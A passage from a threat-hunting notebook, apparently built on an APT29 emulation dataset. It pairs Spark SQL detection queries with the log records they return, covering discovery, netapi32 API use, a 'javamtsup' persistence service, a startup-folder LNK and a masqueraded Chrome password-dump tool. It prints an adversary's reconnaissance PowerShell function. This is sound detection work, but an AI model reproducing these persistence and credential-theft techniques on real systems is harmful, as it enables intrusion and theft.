      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetgroups%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.10. Execution through API

Procedure: Executed API call by reflectively loading Netapi32.dll

Criteria: The NetUserGetGroups API function loaded into powershell.exe from Netapi32.dll

Detection Type:Telemetry(Correlated)

Query ID:0B50643F-98FA-4F4A-8E22-9257D85AD7C5

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
AND f.EventID = 7
AND LOWER(f.ImageLoaded) LIKE "%netapi32.dll"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 03:04:04.361
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ImageLoaded: C:\Windows\System32\netapi32.dll
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Net Win32 API DLL
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: NetApi32.DLL
Hashes: SHA1=7DFDD188B30162DAA87FDD3E5B7A55C80CD839F1,MD5=86A9DF3FA9D5FCAC8EF57601FCCD78F9,SHA256=F8CDA38FD3FF371E772875EA657A37662321EBB7AD8D6978DBCCCA7FC6DB64F1,IMPHASH=7D4E1695394CF47BD397AFD45A40E55D
Signed: true
Signature: Microsoft Windows
SignatureStatus: Valid 

4.C.11. Permission Groups Discovery

Procedure: Enumerated user’s local group membership via the NetUserGetLocalGroups API

Criteria: powershell.exe executing the NetUserGetLocalGroups API

Detection Type:Telemetry(Correlated)

Query ID:1CD16ED8-C812-40B1-B968-F0DABFC79DDF

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetlocalgroups%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:F0AC46E2-63EA-4C8E-AF39-6631444451E5

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetlocalgroups%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.12. Execution through API

Procedure: Executed API call by reflectively loading Netapi32.dll

Criteria: The NetUserGetLocalGroups API function loaded into powershelle.exe from Netapi32.dll

Detection Type:Telemetry(Correlated)

Query ID:53CEF026-66EF-4B26-B5C9-10D4BBA3F9E8

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
AND f.EventID = 7
AND LOWER(f.ImageLoaded) LIKE "%netapi32.dll"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 03:04:04.361
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ImageLoaded: C:\Windows\System32\netapi32.dll
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Net Win32 API DLL
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: NetApi32.DLL
Hashes: SHA1=7DFDD188B30162DAA87FDD3E5B7A55C80CD839F1,MD5=86A9DF3FA9D5FCAC8EF57601FCCD78F9,SHA256=F8CDA38FD3FF371E772875EA657A37662321EBB7AD8D6978DBCCCA7FC6DB64F1,IMPHASH=7D4E1695394CF47BD397AFD45A40E55D
Signed: true
Signature: Microsoft Windows
SignatureStatus: Valid 

5.A.1. New Service

Procedure: Created a new service (javamtsup) that executes a service binary (javamtsup.exe) at system startup

Criteria: powershell.exe creating the Javamtsup service

Detection Type:Telemetry(Correlated)

Query ID:A16CE10D-6EE3-4611-BE9B-B023F36E2DFF

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID IN (12,13,14)
  AND (LOWER(TargetObject) LIKE "%javamtsup%" OR LOWER(Details) LIKE "%javamtsup%")

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup                                                 
-RECORD 1---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\Type
Details: DWORD (0x00000010)                              
-RECORD 2---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\Start
Details: DWORD (0x00000002)                             
-RECORD 3---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\ErrorControl
Details: DWORD (0x00000001)                      
-RECORD 4---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\ImagePath
Details: C:\Windows\System32\javamtsup.exe          
-RECORD 5---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\DisplayName
Details: Java(TM) Virtual Machine Support Service 
-RECORD 6---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\ObjectName
Details: LocalSystem                               

Query ID:E76C4174-C24A-4CA3-9EA8-46C5286D3B6F

df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId, d.ParentProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4103
  AND LOWER(f.Payload) LIKE "%new-service%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(New-Service): "New-Service"
ParameterBinding(New-Service): name="Name"; value="javamtsup"
ParameterBinding(New-Service): name="BinaryPathName"; value="C:\Windows\System32\javamtsup.exe"
ParameterBinding(New-Service): name="DisplayName"; value="Java(TM) Virtual Machine Support Service"
ParameterBinding(New-Service): name="StartupType"; value="Automatic"
 

Query ID:AA3EF640-2720-4E8A-B86D-DFCF2FDB86BD

df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4103
  AND LOWER(f.Payload) LIKE "%new-service%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(New-Service): "New-Service"
ParameterBinding(New-Service): name="Name"; value="javamtsup"
ParameterBinding(New-Service): name="BinaryPathName"; value="C:\Windows\System32\javamtsup.exe"
ParameterBinding(New-Service): name="DisplayName"; value="Java(TM) Virtual Machine Support Service"
ParameterBinding(New-Service): name="StartupType"; value="Automatic"
 

5.B.1. Registry Run Keys / Startup Folder

Procedure: Created a LNK file (hostui.lnk) in the Startup folder that executes on login

Criteria: powershell.exe creating the file hostui.lnk in the Startup folder

Detection Type:Telemetry(Correlated)

Query ID:611FCA99-97D0-4873-9E51-1C1BA2DBB40D

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 11
    AND f.TargetFilename RLIKE '.*\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | File created:
RuleName: -
UtcTime: 2020-05-02 03:04:23.681
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\hostui.lnk
CreationUtcTime: 2020-05-02 03:04:23.681 

6.A.1. Credentials in Files

Procedure: Read the Chrome SQL database file to extract encrypted credentials

Criteria: accesschk.exe reading files within %APPDATALOCAL%\Google\chrome\user data\default\

Detection Type:None(None)

6.A.2. Credential Dumping

Procedure: Executed the CryptUnprotectedData API call to decrypt Chrome passwords

Criteria: accesschk.exe executing the CryptUnprotectedData API

Detection Type:None(None)

6.A.3. Masquerading

Procedure: Masqueraded a Chrome password dump tool as accesscheck.exe, a legitimate Sysinternals tool

Criteria: Evidence that accesschk.exe is not the legitimate Sysinternals tool

Detection Type:Telemetry(Correlated)

Query ID:0A19F9B7-5E17-47E5-8015-29E9ABC09ADC

df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
    SELECT f.ProcessGuid
    FROM apt29Host f
    INNER JOIN (
      SELECT d.ProcessGuid, d.ParentProcessGuid
      FROM apt29Host d
      INNER JOIN (
        SELECT a.ProcessGuid, a.ParentProcessGuid
        FROM apt29Host a
        INNER JOIN (
          SELECT ProcessGuid
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(Image) LIKE "%control.exe"
              AND LOWER(ParentImage) LIKE "%sdclt.exe"
        ) b
        ON a.ParentProcessGuid = b.ProcessGuid
        WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND a.IntegrityLevel = "High"
      ) c
      ON d.ParentProcessGuid= c.ProcessGuid
      WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND d.EventID = 1
        AND d.Image LIKE '%powershell.exe'
    ) e
    ON f.ParentProcessGuid = e.ProcessGuid
    WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND f.EventID = 1
      AND LOWER(f.Image) LIKE '%accesschk%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 7
    AND LOWER(ImageLoaded) LIKE '%accesschk%'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 03:04:34.959
ProcessGuid: {47ab858c-e342-5eac-d703-000000000400}
ProcessId: 9204
Image: C:\Program Files\SysinternalsSuite\accessChk.exe
ImageLoaded: C:\Program Files\SysinternalsSuite\accessChk.exe
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
Hashes: SHA1=691E81A8FA152F68FB8ACEFE8F59EA41DC995880,MD5=44F96457ADEB95AFD3F5457082D44538,SHA256=3247D21BC9BBBD8DF670A82E24BE754A2D58D2511EE64AFF0A1E3756CD288236,IMPHASH=8A672B6C29F8A80FC01C6E44A3CDEE82
Signed: false
Signature: -
SignatureStatus: Unavailable 

Detection Type:General(Correlated)

Query ID:1FCE98FC-1FF9-41CB-9C25-0235729A2B01

df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
    SELECT f.ProcessGuid
    FROM apt29Host f
    INNER JOIN (
      SELECT d.ProcessGuid, d.ParentProcessGuid
      FROM apt29Host d
      INNER JOIN (
        SELECT a.ProcessGuid, a.ParentProcessGuid
        FROM apt29Host a
        INNER JOIN (
          SELECT ProcessGuid
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(Image) LIKE "%control.exe"
              AND LOWER(ParentImage) LIKE "%sdclt.exe"
        ) b
        ON a.ParentProcessGuid = b.ProcessGuid
        WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND a.IntegrityLevel = "High"
      ) c
      ON d.ParentProcessGuid= c.ProcessGuid
      WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND d.EventID = 1
        AND d.Image LIKE '%powershell.exe'
    ) e
    ON f.ParentProcessGuid = e.ProcessGuid
    WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND f.EventID = 1
      AND LOWER(f.Image) LIKE '%accesschk%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 7
    AND LOWER(ImageLoaded) LIKE '%accesschk%'

'''
)
df.show